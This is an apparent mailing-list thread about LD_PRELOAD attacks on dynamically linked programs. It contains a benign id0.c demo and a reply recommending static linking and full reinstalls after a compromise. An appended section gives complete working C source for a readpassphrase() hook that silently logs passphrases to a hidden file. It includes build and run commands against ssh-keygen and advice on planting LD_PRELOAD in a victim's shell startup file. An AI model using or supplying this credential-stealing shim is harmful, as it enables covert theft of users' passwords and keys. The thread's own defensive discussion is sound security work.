On 17-02-2014 10:59, Daniel Cegiełka wrote:
> 2014-02-17 13:15 GMT+01:00 <[email protected]>:
>> On 16 February 2014 at 10:11 PM, "Daniel Cegiełka"
>> <[email protected]> wrote:
>>
>> try this:
>>
>> --- cat id0.c ---
>> /* Fake credential calls: every caller is told it is root. */
>> #include <sys/types.h>
>> #include <unistd.h>
>> uid_t getuid(void)  { return 0; }
>> uid_t geteuid(void) { return 0; }
>> gid_t getgid(void)  { return 0; }
>> gid_t getegid(void) { return 0; }
>> --- end cut ---
>>
>> # shell (as normal user):
>> id -un
>> cc -shared -fPIC id0.c -o id0
>> LD_PRELOAD=./id0 sh
>> id -un
>>
>>
>> What does that do?
>>
>> O.D.
> Nothing (it's safe to self-test, so have fun). id (or whoami) thinks
> that it calls functions from libc, but it really calls functions that are
> loaded by LD_PRELOAD. These fake functions return 0, so id (whoami)
> thinks that you are root. Attacks with LD_PRELOAD are very old and can
> be performed on any OS where you have dynamic linking (Linux, *BSD
> etc.), so yes, OpenBSD is "vulnerable" to this type of stuff.
>
> The real attack can be done by loading e.g. a fake readpassphrase() function.
>
> http://www.openbsd.org/cgi-bin/man.cgi?query=readpassphrase&sektion=3
>
> readpassphrase() is used e.g. in /usr/libexec/auth/login_* stuff,
> signify, ssh, ssh-keygen, ssh-agent, nc, ftp etc. Each of these
> programs is dynamically linked, so is sensitive to LD_PRELOAD. If an
> attacker __can__ LD_PRELOAD a false readpassphrase(), they will e.g. be able
> to get to know your password.
>
> Solution: static linking of critical binaries.
>
> I hope that my explanation was helpful.
>
> best regards,
> Daniel
>

Static linking does solve the issue with this particular rootkit, but won't help with kmod rootkits. The truth is that there is no bulletproof solution in any case: if your machine was compromised, you should assume that it has some form of rootkit and should proceed with a full re-installation of the OS. And you should scan your backups very thoroughly to make sure that they won't reinstall the rootkit. I'm not even mentioning other forms of rootkits that are OS agnostic, such as BIOS, MBR, etc.

There are even HDD controller backdoors these days: http://spritesmods.com/?art=hddhack.

Cheers,
-- 
Giancarlo Razzolini
GPG: 4096R/77B981BC
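The readpassphrase() attack Daniel sketches above, written out as a preloadable shared object. This is an added example for the thread, not code posted by Daniel, Giancarlo or the OpenBSD project; the file name rp_shim.c, the RP_SHIM_LOG variable, the default log path and the rp_shim_* helper names are all assumptions made here. The hook logs each passphrase and then hands the real result back to the caller, so the victim program keeps working and gives no sign that anything sits in front of libc.

```c
/*
 * rp_shim.c: LD_PRELOAD interposer for readpassphrase(3).
 * Added example for this thread; not code from the thread or from OpenBSD.
 *
 * Build as a shared object and preload it into any dynamically linked
 * program that prompts with readpassphrase(). The passphrase is written to
 * a log and then returned to the program unchanged, so nothing visibly breaks:
 *
 *   cc -shared -fPIC -o rp_shim.so rp_shim.c      # glibc < 2.34 also needs -ldl
 *   RP_SHIM_LOG=/tmp/.rp LD_PRELOAD=./rp_shim.so ssh-keygen -p -f id_ed25519
 *
 * RP_SHIM_LOG and the default path below are invented for this example.
 */
#define _GNU_SOURCE             /* RTLD_NEXT on glibc */
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Prototype of readpassphrase(3) as documented for OpenBSD and libbsd. */
typedef char *(*readpassphrase_fn)(const char *, char *, size_t, int);

static const char *rp_shim_log_path(void)
{
    const char *p = getenv("RP_SHIM_LOG");
    return (p != NULL && *p != '\0') ? p : "/tmp/.rp_capture";
}

/*
 * Append "prompt<TAB>secret\n" to path (created mode 0600). Returns 0 on
 * success, -1 on error. Kept separate from the hook so it can be exercised
 * on a system that has no real readpassphrase() at all.
 */
int rp_shim_record(const char *path, const char *prompt, const char *secret)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
    if (fd < 0)
        return -1;
    FILE *f = fdopen(fd, "a");
    if (f == NULL) {
        close(fd);
        return -1;
    }
    int rc = fprintf(f, "%s\t%s\n", prompt ? prompt : "", secret ? secret : "") < 0 ? -1 : 0;
    if (fclose(f) != 0)
        rc = -1;
    return rc;
}

/*
 * Copy the last record in path into out (newline stripped).
 * Returns 1 if a record was found, 0 if the file is missing or empty.
 */
int rp_shim_last_record(const char *path, char *out, size_t outsz)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return 0;
    int found = 0;
    char line[1024];
    while (fgets(line, sizeof line, f) != NULL) {
        line[strcspn(line, "\n")] = '\0';
        snprintf(out, outsz, "%s", line);
        found = 1;
    }
    fclose(f);
    return found;
}

/*
 * The hook. The preloaded object is searched first, so the victim's call
 * lands here; RTLD_NEXT then finds the genuine implementation further down
 * the search order (libc on OpenBSD, libbsd on Linux) and we forward to it.
 */
char *readpassphrase(const char *prompt, char *buf, size_t bufsiz, int flags)
{
    readpassphrase_fn real = (readpassphrase_fn)dlsym(RTLD_NEXT, "readpassphrase");
    if (real == NULL) {          /* nothing behind us implements it */
        errno = ENOSYS;
        return NULL;
    }
    char *r = real(prompt, buf, bufsiz, flags);
    if (r != NULL)               /* copied out before the caller ever sees it */
        (void)rp_shim_record(rp_shim_log_path(), prompt, buf);
    return r;
}
```

Two practical checks follow from the thread. A statically linked binary never runs the dynamic loader, so it cannot pick this object up; `file` on the binary should report it as statically linked before you rely on that. Also, ld.so ignores LD_PRELOAD for set-user-ID executables, which is why the variable has to be planted in the environment of an ordinary user's session (a shell rc file, for instance) and why a hit there compromises everything that user later types a passphrase into, not the system's privilege boundary itself.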

